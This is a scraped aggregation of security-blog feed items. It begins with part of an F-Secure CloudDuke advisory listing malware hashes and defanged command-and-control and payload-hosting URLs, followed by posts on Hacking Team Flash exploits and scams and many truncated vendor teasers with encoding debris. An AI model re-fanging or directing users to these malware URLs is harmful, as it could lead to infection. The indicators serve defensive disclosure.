F-Secure detects CloudDuke as Trojan:W32/CloudDuke.B and Trojan:W64/CloudDuke.B
Samples:
04299c0b549d4a46154e0a754dda2bc9e43dff76
2f53bfcd2016d506674d0a05852318f9e8188ee1
317bde14307d8777d613280546f47dd0ce54f95b
476099ea132bf16fa96a5f618cb44f87446e3b02
4800d67ea326e6d037198abd3d95f4ed59449313
52d44e936388b77a0afdb21b099cf83ed6cbaa6f
6a3c2ad9919ad09ef6cdffc80940286814a0aa2c
78fbdfa6ba2b1e3c8537be48d9efc0c47f417f3c
9f5b46ee0591d3f942ccaa9c950a8bff94aa7a0f
bfe26837da22f21451f0416aa9d241f98ff1c0f8
c16529dbc2987be3ac628b9b413106e5749999ed
cc15924d37e36060faa405e5fa8f6ca15a3cace2
dea6e89e36cf5a4a216e324983cc0b8f6c58eaa8
e33e6346da14931735e73f544949a57377c6b4a0
ed0cf362c0a9de96ce49c841aa55997b4777b326
f54f4e46f5f933a96650ca5123a4c41e115a9f61
f97c5e8d018207b1d546501fe2036adfbf774cfd
Compromised servers used for command and control:
hxxps://cognimuse.cs.ntua.gr/search.php
hxxps://portal.sbn.co.th/rss.php
hxxps://97.75.120.45/news/archive.php
hxxps://portal.sbn.co.th/rss.php
hxxps://58.80.109.59/plugins/search.php
Compromised websites used to host CloudDuke:
hxxp://flockfilmseries.com/eFax/incoming/5442.ZIP
hxxp://www.recordsmanagementservices.com/eFax/incoming/150721/5442.ZIP
hxxp://files.counseling.org/eFax/incoming/150721/5442.ZIP
On 22/07/15 At 11:59 AM
Read MoreVPRO (the Dutch public broadcasting organization) produced a 45-minute documentary about hacking and the trade of zero days. The documentary has now been released in English on YouTube.
The documentary features Charlie Miller, Joshua Corman, Katie Moussouris, Ronald Prins, Dan Tentler, Eric Rabe (of Hacking Team), Felix Lindner, Rodrigo Branco, Ben Nagy, The Grugq, and many others.
On 20/07/15 At 12:40 PM
Read MoreThe Telegraph published an article on Thursday about a scam targeting iOS users. Here's the gist: scammers are using JavaScript generated dialogs to display warnings of so-called "IOS Crash" reports prompting people to call for tech support. Near the end of the Telegraph's article, the following advice is offered:
"To prevent the issue happening again, go to Settings -> Safari -> Block Pop-ups."
Unfortunately, this advice is incorrect. And perhaps even more unfortunately, some security and tech pundits are now repeating the bad advice on numerous websites. How do we know the advice is wrong? Because we actually tested it…
First of all, this "IOS Crash Report" scam is a variation of the technical support scam, cases of which have been documented as early as 2008. In the past, cold-calls originated directly from call centers in India. But more recently, web-based lures are used to prompt potential victims into contacting the scammers.
A Google Search returns several live scam sites with this text:
"Due to a third party application in your phone, IOS is crashed."
Here's one of the sites as viewed with iOS Safari on an iPad:
Safari's "Fraudulent Website Warning" and "Block Pop-ups" features didn't prevent the page from loading.
What looks like a pop-up on the image above is actually a JavaScript generated dialog. One which will continuously re-spawn itself and can be very difficult to dismiss. Turning off JavaScript in Safari is the quickest way to regain control. Unfortunately, leaving JavaScript disabled will significantly impact a large number of legitimate websites.
Here's the same site as viewed with Google Chrome for Windows:
Notice the additional text in the image above: prevent this page from creating additional dialogs. Current versions of Chrome and Firefox (for Windows, at least) will inject this option into re-spawning dialogs, allowing the user to break the loop. Sadly, Internet Explorer and Safari do not. (We tested with IE for Windows / Windows Phone, and iOS Safari.)
Wouldn't be great if all browsers supported this prevention feature?
Yeah, we think so, too.
But it's not just browsers, apps with browser functionality can also be affected.
Here's an example of a JavaScript dialog displayed via Cydia.
The end of the Telegraph's article included the following advice from City of London police:
"Never give your iCloud username and password or your bank details to someone over the phone."
Indeed! Giving somebody your iCloud password could quickly turn a support scam into a data hijacking and extortion scheme. We attempted to call several of the scammer telephone numbers to see if they would ask for our iCloud credentials — only to discover that the numbers we tried are currently not in service.
Hopefully they stay that way. (They won't.)
On 17/07/15 At 10:15 AM
Read MoreAfter Hacking Team was compromised, a lot of information were publicly disclosed beginning 5th of July, particularly its business clients and a zero-day vulnerability for the Adobe Flash Player that they have been using.
Since the info about the first zero-day was made freely available, we knew attackers would swiftly move into using it. As expected, the flash exploit was integrated into exploit kits such as Angler, Magnitude, Nuclear, Neutrino, Rig, and HanJuan as reported by Kafeine.
Based on our telemetry, there was a rise in Flash exploits beginning 6th and continued until 9th.
Here are the stats for each exploit kit:
The security advisory for CVE-2015-5119 zero-day was released on 7th July and the patch was made available on 8th. So the hits started to decline about two days after the patch.
But just when people have started updating their systems, there was yet another spike from the Angler flash exploit hits:
Apparently, two more flash vulnerabilities, CVE-2015-5122 and CVE-2015-5123, were discovered. These vulnerabilities are still waiting to be patched. According to Kafeine, one of the two vulnerabilities were added into the Angler exploit kit.
As a side note related to Angler exploit kit, if you noticed in the second chart above, Angler and HanJuan share the same statistics. This was due to the fact that our detections for Angler Flash exploits were also hitting on HanJuan Flash exploits.
We have verified this after discovering that there was a different URL pattern being detected by Angler:
We looked at the flash exploit used by both kits, and the two are very much identical.
Angler Flash Exploit:
HanJuan Flash Exploit:
There were already speculations that there seem to be strong connections between the actors behind the two exploits kits. For example, both have used �fileless� delivery of payload and even similar encryption methods. Perhaps at some point we will see HanJuan supporting this new flash 0 day as well.
In the meantime, since there hasn�t been a patch out yet for these new ones, our users remain protected from the effects of the exploit kits through Browsing Protection as well as these detections:
Exploit:SWF/AnglerEK.L
Exploit:SWF/NeutrinoEK.C
Exploit:SWF/NeutrinoEK.D
Exploit:SWF/NuclearEK.H
Exploit:SWF/NuclearEK.J
Exploit:SWF/Salama.H
Exploit:SWF/Salama.R
Exploit:JS/AnglerEK.D
Exploit:JS/NuclearEK.I
Exploit:JS/MagnitudeEK.A
UPDATE: Adobe has released patches for the recent two vulnerabilities: CVE-2015-5122 and CVE-2015-5123. Users are recommended to update to the latest version of Adobe Flash Player.
On 13/07/15 At 12:29 PM
Read MoreWhen hackers get hacked, that's when secrets are uncovered. On July 5th, Italian-based surveillance technology company Hacking Team was hacked. The hackers released a 400GB torrent file with internal documents, source code, and emails to the public - including the company's client list of close to 60 customers.
The list included countries such as Sudan, Kazakhstan and Saudi Arabia - despite official company denials of doing business with oppressive regimes. The leaked documents strongly implied that in the South-East Asian region, government agencies from Singapore, Thailand and Malaysia had purchased their most advanced spyware, referred to as a Remote Control System (RCS).
According to security researchers Citizen Lab, this spyware is extraordinarily intrusive, with the ability to turn on microphone and cameras on mobile devices, intercept Skype and instant messages, and use an anonymizer network of proxy servers to prevent harvested information from being traced back to the command and control servers.
Based on images of the client list posted to pastebin the software was purchased in Malaysia by the Malaysia Anti-Corruption Commission (MACC), Malaysia Intelligence (MI) and the Prime Minister's Office (PMO):
Additional images of leaked invoices posted to medium.com indicated the spyware was sold through a locally-based Malaysian company named Miliserv Technologies (M) Sdb Bhd (registered with the Ministry of Finance Malaysia), which specializes in providing digital forensics, intelligent gathering and public security services:
Why the Prime Minister's Office would need surveillance software remains puzzling. Mind you, professional grade spyware ain't cheap - a license upgrade could cost you MYR400, 000 and maintenance renewal will set you back about MYR160,000.
According to reports of the incident in Malaysian alternative media, Malaysian government agencies have probably been using the spyware even before discovery of the FinFisher malware that was detected in the run-up to the 2013 General Elections.
Coincidentally, Malaysia has also been the frequent host of the annual ISS World Asia tradeshow, where companies promote their arsenal of 'lawful' surveillance software to law enforcement agencies, telco service provider or government employees. During the 2014 event, the Hacking Team was present and the associate lead sponsor of the event.
MiliServ Technologies is currently involved in the upcoming 2015 ISS World Asia in Kuala Lumpur. The event is invitation-only � though it may be interesting to see if Hacking Team will make it there this year.
Post by – Su Gim
On 08/07/15 At 02:31 AM
Read MoreThe Wassenaar Arrangement, a multilateral export control regime, defines "intrusion software" as software specially designed or modified to avoid detection by monitoring tools, or to defeat protective countermeasures, of a computer or network capable device. Intrusion software is used to: extract data or information, or to modify system or user data; or to modify the standard execution path of a program or process in order to allow the execution of externally provided instructions.
Wassenaar states that monitoring tools are software or hardware devices that monitor system behaviours or processes running on a device. This includes antivirus (AV) products, end point security products, Personal Security Products (PSP), Intrusion Detection Systems (IDS), Intrusion Prevention Systems (IPS) or firewalls.
(Source)
So… what we at F-Secure (and the rest of the antivirus industry) call "malware" appears to easily fit Wassenaar's definition of intrusion software.
Why is this interesting?
Well, the US Bureau of Industry and Security (BIS), part of the US Department of Commerce, has proposed updating its rules to require a license for the export of intrusion software.
And according to the Dept of Commerce, "an export" is –any– item that is sent from the United States to a foreign destination. "Items" include among other things, software and technology.
The Paradox
So… if malware is intrusion software, and any item is an export, how exactly are US-based customers supposed to submit a malware sample to their European antivirus vendor? Seriously, customers send us zero-day using malware all the time. Not to mention the samples that we routinely exchange with other trusted AV vendors from around the globe.
Unintended Consequences
The text associated with the BIS proposal says the scope includes penetration testing products that use intrusion software in what looks like an attempt to limit "hacking" tools, but there is nothing about what is excluded from the scope. So the BIS might not intend to limit customers from uploading malware samples to their AV vendor, but that could be the effect if this new rule is adopted and arbitrarily enforced. Or else it could just force people to operate in a legal limbo. Is that what we want?
The BIS is taking comments until July 20th.
On 09/06/15 At 01:25 PM
Read MoreI visited the UK last Thursday, found a coffee shop offering "free" Wi-Fi, and read this…
"UK Law states that we must know who is using our Wi-Fi at all times."
Now I'm not a lawyer — but that seems like quite the disingenuous claim.
Mobile number, post code, and date of birth??
I wonder how many people fall for this type of malarkey.
Post by — @Sean
On 08/06/15 At 01:27 PM
Read MoreThere's an iOS vulnerability affecting iPhone, iPad, and even Apple Watch that allows for a denial of service.
Crashing a phone with an SMS? That's so 2008.
S60 SMS Exploit Messages
Unlike 2008, this time kids are reportedly using the vulnerability to harass others.
Apple is working on a security update. But unfortunately… that update very likely won't be available for older iPhones.
Updated to add:
Here's the "Effective Power" exploit crashing an iPhone 6:
Effective Power Unicode iOS hack on iPhone 6
And this… is Effective Power crashing the iOS Twitter app:
Effective Power Unicode iOS hack vs Twitter
On 28/05/15 At 01:56 PM
Read MoreIn the past few days, we received some cases from our customers in Italy and Spain, regarding malicious spam e-mails that pointed to Cryptowall or Cryptolocker ransomware.
The spam e-mails pretended to come from a courier/postal service, regarding a parcel that was waiting to be collected. The e-mails offer a link to track that parcel online:
When we did the initial investigation of the e-mails from our standard test system, the link redirected to Google:
So, no malicious behavior? Well, we noted that the first two URLs were PHP. Since PHP code is executed on the server side, not locally on the client, it is possible that the servers were 'deciding' whether to redirect the user to Google or to serve malicious content, based on some preset conditions.
Since this particular spam e-mail is written in Italian - perhaps only a customer based in Italy would be able to see the malicious payload? Fortunately, we have Freedome, so we can travel to Italy for a little while to experiment.
So we turned on Freedome, set the location to Milan and clicked the link in the e-mail again:
Now we see the bad stuff. If the user is (or appears to be) located in Italy, the server will redirect them to a malicious file hosted on a cloud storage server.
The e-mail spam sent to Spanish users is similar, though in those cases, a CAPTCHA challenge is included to make the site seem more authentic. If the link in the e-mail is clicked by a user located outside Spain, again we end up in Google:
If the site is visited instead from an Spanish IP, we get to the CAPTCHA screen:
And then to the malware itself:
This spam campaign doesn't use any exploits (so far), just old-fashioned social engineering; infection only occurs if the user manually downloads and executes the files offered on the malicious URLs. For our customers, the URLs are blocked and the files are detected.
(malware SHA1s: 483be8273333c83d904bfa30165ef396fde99bf2, 295042c167b278733b10b8f7ba1cb939bff3cb38)
Post by — Victor
On 19/05/15 At 03:17 AM
Read MoreSecuring your SSH password is very important. Otherwise, you might be pwned by a little girl with her Raspberry Pi.
Don't worry, it's an authorized hack, she asked her mom for permission.
On 15/05/15 At 12:46 PM
Read MoreThe post Email Security Considerations for Microsoft 365 Users appeared first on GreatHorn.
Read MoreThe post Email Security Considerations for Google Workspace Users appeared first on GreatHorn.
Read MoreThe post Show the Value of Your Email Security Solutions: Don’t Just Measure Detection Rates appeared first on GreatHorn.
Read MoreThe post Universities and Colleges Face Multi-faceted Email Security Challenges appeared first on GreatHorn.
Read MoreThe post Spam vs Phish: The Problem with User-Reported Phish Buttons appeared first on GreatHorn.
Read MoreBad actors around the globe go phishing in emails twenty-four hours a day, seven days a week. Whether they are “guppies” like your local bakery down the street or big “fish” like Google, no one is immune to their attacks. Google, one of the largest, most well-known – and used – applications, will always be […]
The post Phishing for Google Impersonation Attacks appeared first on GreatHorn.
Read MoreGMX (Global Mail eXchange) Mail is an email service where users may register up to 10 individual email addresses at no cost. As a result, threat actors are leveraging this service to easily spin up new email addresses and effectively delivering phishing attacks that bypass Microsoft o365 and Google Workspace, landing in an organization’s email […]
The post GMX.Net Phishing Campaigns: Why They’re Hitting Users’ Inboxes appeared first on GreatHorn.
Read MoreThe shift from on-premise email platforms to cloud email platforms has taken shape, with the majority (70%) of organizations. Microsoft 365 and Google Workspace remain the predominant email platforms for organizations. However, a significant change has occurred in the past year. With an estimated 40% of ransomware attacks that start through email, and BEC and […]
The post Native vs SEG vs ICES: What You Need to Know About Email Security appeared first on GreatHorn.
Read MoreIn cybersecurity, buzzwords come and go, often being replaced with new buzzwords while the market is still attempting to realize the benefits of the former. Today, every technology vendor is talking about Artificial Intelligence (AI). In reality, Machine Learning (the method to one day achieve AI) is still the predominant technical solution deployed within vendor […]
The post Blueberry Muffins vs Blonde Chihuahuas: Debunking Artificial Intelligence in Email Security appeared first on GreatHorn.
Read MoreOur global supply chain includes all the people, companies and countries that need to work cohesively to manufacture, process and ship goods. Disruptions in the global supply chain are increasingly impacting organizations, with logistical problems crossing most industries. As a result, the continued strain on the supply chain puts added pressure on businesses as they […]
The post Global Supply Chain: Attackers Targeting Business Deliveries appeared first on GreatHorn.
Read MoreFree software is everywhere, used for email, marketing, accounting, scheduling, and even storing customer data. For small businesses under pressure, it’s a tempting way to cut costs and stay afloat. But “free” often comes with strings. Many of these tools don’t offer strong security, putting your customers or clients at risk. What looks like a […]
The post The hidden price of free: How businesses’ cost-cutting tech choices compromise your security appeared first on Heimdal Security Blog.
Read MoreSocial engineering and AI-driven fraud are climbing to the top of global security concerns. The World Economic Forum lists them among the biggest cybersecurity threats of 2025. And the threat is no longer just spam emails with obvious typos. Today’s scams are targeted, convincing, and increasingly powered by artificial intelligence. We’re not just talking about phishing […]
The post The evolution of social engineering and the rise of AI-powered cybercrime appeared first on Heimdal Security Blog.
Read MoreWelcome back to the MSP Security Playbook, the podcast that helps MSPs cut through the noise, eliminate inefficiencies, and build stronger, more profitable security businesses. I’m your host, Jacob Hazelbaker, business development representative at Heimdal Security, an industry-leading unified and AI-powered cybersecurity solutions provider. Today, I’m diving into a critical topic: the future of MSPs […]
The post MSPs in 2025: From “Break-Fix to Business Advisor” with Nigel Moore appeared first on Heimdal Security Blog.
Read MoreCOPENHAGEN, Denmark, May 21, 2025 – Heimdal launches a new podcast, The MSP Security Playbook – a show for managed service providers ready to scale smarter, boost profitability, and lead with next-gen cybersecurity solutions. The first episode features Nigel Moore, founder of The Tech Tribe, who discusses how MSPs can move beyond reactive IT support models and embrace more […]
The post Heimdal Launches New Podcast: The MSP Security Playbook appeared first on Heimdal Security Blog.
Read MoreIn NHS cybersecurity, one problem keeps security teams up at night: the gap between spotting issues and actually fixing them. If you work in healthcare IT, you know this headache all too well. Legacy systems that can’t be easily patched, security teams stretched too thin, and the constant balancing act of keeping operations running while […]
The post When Visibility Meets Action in NHS Cybersecurity appeared first on Heimdal Security Blog.
Read MoreSince 2020, there has been a sharp rise in the number of cyberattacks targeting educational institutions. And PDF malware is one of the most common attack vectors. Through my work at Heimdal, I regularly speak with staff at universities, schools, and other educational institutions. While IT professionals are usually aware of the risks posed by […]
The post PDF Malware: How Educational Institutions Can Prevent Infection Spreading appeared first on Heimdal Security Blog.
Read MoreThe post NIS2 Compliance Checklist appeared first on Heimdal Security Blog.
Read MoreThe post EU Adopts New Cybersecurity Rules for Critical Infrastructure Under NIS2 Directive appeared first on Heimdal Security Blog.
Read MoreThe post NIS2 Compliance | Challenges, Pain Points and Solutions appeared first on Heimdal Security Blog.
Read MoreThe post NIS2 Compliance – How to Do It Sustainably by Continuous Compliance appeared first on Heimdal Security Blog.
Read MoreThe post How to Negotiate Your NIS2 Fine or Completely Avoid the Risk appeared first on Heimdal Security Blog.
Read MoreThe post How to Prepare for NIS2 Audits – A Compliance Expert’s View appeared first on Heimdal Security Blog.
Read MoreThe post 5 Best NIS2 Compliance Software and Solution Providers appeared first on Heimdal Security Blog.
Read MoreThe post Effective Privileged Access Management Implementation: A Step-by-Step Guide appeared first on Heimdal Security Blog.
Read MoreThe post Privileged Access Management (PAM) – PAM in the Cloud vs PAM for the Cloud appeared first on Heimdal Security Blog.
Read MoreNo summary available.
Read MoreDShield honeypots &#;x26;#;x5b;1&#;x26;#;x5d; receive different types of attack traffic and the volume of that traffic can change over time. I&#;x26;#;39;ve been collecting data from a half dozen honeypots for a little over a year to make comparisons. This data includes:
Read MoreNo summary available.
Read More[This is a Guest Diary by Ehsaan Mavani, an ISC intern as part of the SANS.edu BACS program]
Read More&#;x26;#;x5b;This is a Guest Diary by Jennifer Wilson, an ISC intern as part of the SANS.edu Bachelor&#;x26;#;39;s Degree in Applied Cybersecurity (BACS) program &#;x26;#;x5b;1].]
Read MoreNo summary available.
Read MoreThis is nothing "amazingly new", but more of a reminder to secure your "authorized_keys" file for SSH. One of the first things I see even simple bots do to obtain persistent access to a UNIX system is to add a key to the authorized_keys file of whatever account they are compromising.
Read MoreNo summary available.
Read MoreDidier recently published several diaries related to steganography. I have to admit that steganography isn&#;x26;#;39;t exactly my favorite topic. It is one of those "neat" infosec toys, but its applicability is limited. Data exfiltration usually does not require proper steganography, but just appending data to an image will usually work just fine.
Read MoreNo summary available.
Read MoreCheck out the 25 new pieces of training content added in May, alongside the always fresh content update highlights, new features and events.
Read MoreCybersecurity experts are warning that scammers are taking advantage of uncertainty surrounding the U.S. administration’s tariff policies, CNBC reports.
Read MoreHuman risk management involves more than security awareness training, but training is a huge part of the mix.
Read MoreI was once enrolled in a programming module back at university. We had been given a task, to code something, so we all sat banging out whatever code we could on our keyboards.
Read MoreSince March 2025, the KnowBe4 Threat Labs team has observed a surge in phishing attacks that exploit Google’s AppSheet platform to launch a highly targeted, sophisticated campaign impersonating social media platform giant Meta.
Read MoreMany organizations, after a period of relative quiet, might believe the ransomware bubble has burst. The headlines may have shifted, and other emerging cyber threats might seem to dominate the news cycle, but recent data from Marsh's 2024 UK cyber insurance claims report suggests otherwise.
Read MoreNon-human service accounts have quietly become one of the biggest liabilities in enterprise security.
Related: Why identity is the cornerstone of cyber defense
These machine credentials — used to automate connections between systems — now outnumber humans by 30 to … (more…)
The post RSAC Fireside Chat: Human and machine identity risks are converging — and they’re finally visible first appeared on The Last Watchdog.
Read MoreExecutives are under digital siege—and most don’t even know it.
Related: Shareholders sue over murder
At RSAC 2025, I sat down with Chuck Randolph, SVP of Strategic Intelligence and Security at 360 Privacy, to unpack a … (more…)
The post RSAC Fireside Chat: Cyber risk mitigation turns personal–defending the CEO as an attack vector first appeared on The Last Watchdog.
Read MoreReactive security isn’t just outdated — it’s become a liability. Attackers have figured out how to weaponize speed, and defenders are struggling to keep pace.
Related: Mastering adversary emulation
At RSAC 2025, I spoke with Derek Manky, Chief … (more…)
The post RSAC Fireside Chat: ‘Purple’ teams dismantle the reactive trap — and can help restore cyber readiness first appeared on The Last Watchdog.
Read MoreMiami, Fla., May 22, 2025, CyberNewsWire — Halo Security, a leading provider of attack surface management and penetration testing services, today announced it has successfully achieved SOC 2 Type 1 compliance following a comprehensive audit by Insight Assurance.
This … (more…)
The post News Alert: Halo Security reaches SOC 2 milestone, validating its security controls and practices first appeared on The Last Watchdog.
Read MoreCary, NC. May 22, 2025, CyberNewswire — INE Security, a global leader in Cybersecurity training and certifications, has announced a strategic partnership with Abadnet Institute for Training, a Riyadh-based leader in specialized Information Technology, Cybersecurity, and Networking training.… (more…)
The post News alert: INE Security, Abadnet Institute partner to deliver cybersecurity training in Saudi Arabia first appeared on The Last Watchdog.
Read MoreFor years, network security has revolved around the perimeter: firewalls, antivirus, endpoint controls. But as attackers grow more sophisticated — and as operations scatter to the cloud, mobile, and IoT — it’s increasingly what happens inside the network that counts.… (more…)
The post SHARED INTEL Q&A: Visibility, not volume — reframing detection for the AI-enabled SOC first appeared on The Last Watchdog.
Read MorePalo Alto, Calif., May 21, 2025 – DataHub, by Acryl Data, the leading open source metadata platform, today announced it has raised $35 million in Series B funding led by Bessemer Venture Partners.
This latest round brings the company’s total … (more…)
The post News alert: DataHub secures $35M Series B to enable AI to safely manage and use data first appeared on The Last Watchdog.
Read MoreDover, Del., May 21, 2025, CyberNewswire — Attaxion, the external attack surface management (EASM) vendor with industry-leading asset coverage, announces the integration of the European Vulnerability Database (EUVD) into its platform.
Operated by the European Union Agency for Cybersecurity … (more…)
The post News alert: Attaxion integrates its EASM Platform with ENISA’s EU Vulnerability Database (EUVD) first appeared on The Last Watchdog.
Read MoreA quiet but consequential shift is underway in enterprise workspace security. The browser has effectively become the new operating system of business.
Related: Gartner’s enterprise browser review
It didn’t happen all at once. But as SaaS took over, remote work … (more…)
The post RSAC Fireside Chat: Enterprise browsers arise to align security with the modern flow of work first appeared on The Last Watchdog.
Read MoreStephen Klein didn’t just stir the pot. He lit a fire.
Related: Klein’s LinkedIn debate
In a sharply worded post that quickly went viral on LinkedIn, the technologist and academic took direct aim at what he called the “hype-as-a-service” business … (more…)
The post MY TAKE: Semantics aside, “agentic AI” is already reshaping how we work, think, envision what’s next first appeared on The Last Watchdog.
Read MoreFour porn sites are being investigated by the European Commission under its Digital Services Act (DSA) for allegedly failing to verify its users' ages properly.
Read MoreMalwarebytes Browser Guard has a cool new feature to protect you against search hijacking.
Read MoreA man is facing a $450,000 AU fine after he published deepfake images of prominent Australian women on the now-defunct MrDeepfakes web site.
Read MoreCybercriminals are using text-to-video-AI tools to lure victims to fake websites that deliver malware like infostealers and Trojans.
Read MoreA renewed warning about toll fee scams has gone out. This time it comes from the DMVs of several US states.
Read MoreA huge dataset with all kinds of sensitive information, likely to be the result of infostealers, has been found unsecured online.
Read MoreA list of topics we covered in the week of May 19 to May 25 of 2025
Read MoreThe Lumma infostealer infrastructure has suffered a serious blow by a coordinated action of the DOJ and Microsoft.
Read MoreA stalkerware company that recently leaked millions of users' personal information online has taken all of its assets offline without any explanation.
Read MoreCybercriminals are using AI-based tools to generate voice clones of the voices of senior US officials in order to scam people.
Read MoreThe bankrupt 23andMe, along with all of its genetic data, has been bought by US drugmaker Regeneron Pharmaceuticals.
Read MoreYou'd hope that spending $6,000 on a printer would give you a secure experience, free from viruses and other malware. However, in the case of Procolored printers, you'd be wrong.
Read MoreThis week on the Lock and Code podcast, we speak with Nick Melvoin about the Los Angeles Unified School District smartphone ban for students.
Read MoreMake sure your Chrome is on the latest version, to patch against an actively exploited vulnerability that can be used to steal sensitive information from websites.
Read MoreA list of topics we covered in the week of May 12 to May 18 of 2025
Read MoreThe CFPB has decided to withdraw a 2024 rule that was aimed at limiting the sale of Americans’ personal information by data brokers.
Read MoreA privacy advocacy group has clapped back at Meta over its plans to start training its AI model on European users' data.
Read MoreThe state of Texas reached a mammoth financial agreement with Google last week, securing $1.375 billion in payments to settle two lawsuits concerning the use of consumers' data.
Read MoreThe Kaleidoscope ad fraud network uses a combination of legitimate and malicious apps, according to researchers.
Read MoreA list of topics we covered in the week of May 4 to May 10 of 2025
Read MoreIn today’s regulatory landscape, organisations face increasing scrutiny over their data protection practices. With fines increasing and regulatory expectations tightening, it’s crucial to identify and address compliance vulnerabilities before they attract unwanted attention from authorities. A recent webinar by GRC Solutions, featuring experts Louise Brooks, Ryan Peeney and Zoe Hewitt, explored how organisations can use data protection gap analysis to identify weak spots in their compliance frameworks and stay ahead of regulators. This blog provides a summary of that webinar. What is a data protection gap analysis? A data protection gap analysis is a robust assessment of your organisation’s data
The post Data Protection Gap Analysis: Identifying Weak Spots Before Regulators Do appeared first on IT Governance Blog.
Read MoreThe MoJ (Ministry of Justice) has disclosed that the LAA (Legal Aid Agency) suffered a data breach last month, in which criminals accessed data relating to hundreds of thousands of people, dating back to 2010. Exfiltrated data may have included “contact details and addresses of applicants, their dates of birth, national ID numbers, criminal history, employment status and financial data such as contribution amounts, debts and payments”. According to the BBC, more than 2 million pieces of information were taken, including data relating to “domestic abuse victims, those in family cases and others facing criminal prosecution”. It’s not known whether
The post Lessons Learned from the Legal Aid Agency Data Breach appeared first on IT Governance Blog.
Read MoreDespite growing awareness and increasingly sophisticated security tools, phishing is still one of the most persistent and pernicious threats of the modern age: according to Proofpoint’s 2024 State of the Phish report, 86% of organisations experienced a phishing attempt last year and over 70% suffered a successful compromise due to human error. Phishing is also the most prevalent form of attack: the UK government’s Cyber Security Breaches Survey 2025 found that phishing accounted for 93% of all cyber crime in the UK. So why is phishing so effective? Simply because it exploits the weakest link in any cyber security setup:
The post How to Spot a Phishing Email in 2025 –with Real Examples and Red Flags appeared first on IT Governance Blog.
Read MoreThe recent DragonForce cyber attacks on the Co-Op, Marks & Spencer and Harrods show the threat of ransomware is as prevalent as ever – and, despite warnings from the attackers that they’re “putting UK retailers on the Blacklist”, it’s obviously not just the retail sector that needs to be concerned. For all organisations, it can be disastrous when systems are encrypted and data is exfiltrated. According to Sophos’s State of Ransomware report for 2024, 59% of organisations were hit by ransomware attacks last year. So what can you do to counter the risk? Ransomware as a service Ransomware is, of
The post The Co-Op, M&S, Harrods… You? Mitigating the Risk of Ransomware appeared first on IT Governance Blog.
Read MoreThe CISSP® (Certified Information Systems Security Professional) qualification is one of the most respected certifications in the information security industry, demonstrating an advanced knowledge of cyber security. It ranks alongside CCSP (Certified Cloud Security Professional) and CSSLP (Certified Secure Software Lifecycle Professional) as one of the most in-demand credentials when hiring C-level leaders in information security. Below, we explain the structure of CISSP and its domains. CISSP was launched in 1994 and its structure was last updated by (ISC)2 in 2015, moving from ten domains to eight. The domain weightings in the CISSP exam were last changed on 15 April 2024. These regular updates
The post The 8 CISSP domains explained appeared first on IT Governance Blog.
Read MoreAnd what are the challenges of migrating to a newer system, such as Windows 11? Windows 10 reaches the end of its lifecycle on 14 October 2025. But what does this mean? What are the challenges of migrating to new systems? What are the security implications? And what are the risks of delaying migration? We put these questions – and others – to our head of security testing, James Pickard. In this interview Hi James. So, what does it mean when systems or software reach the end of their lifecycle? End of life is basically when software or hardware products
The post Windows 10 End of Life: What Does it Mean for Your Organisation? appeared first on IT Governance Blog.
Read MoreCombatting Cyber Terrorism – A guide to understanding the cyber threat landscape and incident response planning Richard has led and operated various vital security projects, including the London 2012 Olympics and Russia 2014 Winter Olympics. He’s also served as executive director of London First’s security and resilience division. In addition, Richard was a senior lecturer in security and resilience at Buckinghamshire New University, and director of the BNU Business School. Currently, he’s director of the business security briefing service CSARN.org and CEO at the Global Cyber Academy. Richard is also a frequent media commentator on AI, cyber security and future
The post Author of the Month: Richard Bingley appeared first on IT Governance Blog.
Read MoreThis month, we are celebrating author Andrew Pattison! His book: NIST CSF 2.0 – Your essential introduction to managing cybersecurity risks was published in February 2025 and covers the latest updates to the NIST framework. The NIST CSF (Cybersecurity Framework) 2.0 is designed to help organisations prevent and protect themselves from cyber attacks. This book will help you understand how to: About the author: Andrew Pattison is the global head of GRC and PCI consultancy at GRC International Group, a GRC Solutions company. He has been working in information security, risk management and business continuity since the mid-1990s, helping
The post Author of the Month: Andrew Pattison appeared first on IT Governance Blog.
Read MoreThe Cyber Essentials scheme is updated each year to ensure its best-practice approach to basic cyber security remains relevant. So, what’s new for 2025? Cyber Essentials and Cyber Essentials Plus: what’s new in the 2025 update? As of 28 April 2025, new Cyber Essentials certifications will be assessed according to v3.2 of the NCSC Requirements for IT Infrastructure and must use the new ‘Willow’ Question Set, which replaces the Montpellier version. The changes introduced by the 2025 update are minor, but organisations will still need to be aware of what’s expected of them. Here’s a high-level summary. Cyber Essentials Requirements
The post The Cyber Essentials Scheme’s 2025 Update and What it Means for Your Organisation appeared first on IT Governance Blog.
Read More‘GDPR’ has become a familiar term. We recognise the visible and consumer-facing aspects of the General Data Protection Regulation in our everyday lives – when consumers exercise their right to withdraw consent to their data being processed via ‘opt out’ or ‘unsubscribe’ buttons, for example. What’s less evident is whether organisations are keeping their practices fully up to date and in line with the GDPR and other applicable data protection laws. For instance: So, how sure are you that your organisation is fully compliant with the relevant data protection legislation? In this blog ‘Once compliant’ does not mean ‘still compliant’
The post What It Takes to Be Your Organisation’s DPO or Data Privacy Lead appeared first on IT Governance Blog.
Read MoreThis report contains statistics on vulnerabilities and published exploits, along with an analysis of the most noteworthy vulnerabilities we observed in the first quarter of 2025.
Read MoreA comprehensive historical breakdown of Zanubis' changes, including RC4 and AES encryption, credentials stealing and new targets in Peru, provided by Kaspersky GReAT experts.
Read MoreKaspersky experts break down an updated cryptojacking campaign targeting containerized environments: a Dero crypto miner abuses the Docker API.
Read MoreKaspersky ICS CERT shares trends and statistics on industrial threats in Q1 2025.
Read MoreKaspersky experts discuss optimizing penetration testing with an agent for the Mythic framework and object files for Cobalt Strike.
Read MoreKaspersky researchers review ransomware trends for 2024, analyze the most active groups and forecast how this threat will evolve in 2025.
Read MoreThe Kaspersky Global Emergency Response Team (GERT) detected an Outlaw mining botnet in a customer incident. In this article, we share insights into this botnet's SSH-based infection chain.
Read MoreKaspersky expert has discovered a new version of the Triada Trojan, with custom modules for Telegram, WhatsApp, TikTok, and other apps.
Read MoreKaspersky GReAT experts uncovered a new campaign by Lazarus APT that exploits vulnerabilities in South Korean software products and uses a watering hole approach.
Read MoreWhile investigating an incident, we discovered a sophisticated new backdoor targeting Russian organizations by impersonating secure networking software updates.
Read More